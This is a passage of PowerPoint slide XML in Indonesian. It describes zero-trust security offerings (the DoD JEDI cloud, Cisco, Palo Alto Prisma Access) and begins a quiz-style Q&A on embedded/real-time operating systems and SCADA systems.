            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodernisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cloud JEDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DoD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cisco Zero Trust Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia maya, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Palo Alto Networks Prisma Akses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Prisma Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekaligus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355041080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1. What is a purpose-specific operating system with designs heavily focused on high levels of stability and processing speed?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Embedded operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Real-Time Operating System (RTOS).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomotif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesawat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>reliability, determinism, dan high performance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows/Linux desktop).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. What are the systems control machinery that is used in critical infrastructure, like power suppliers, water suppliers, health services, telecommunications, and national security services?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SCADA (Supervisory Control and Data Acquisition) systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
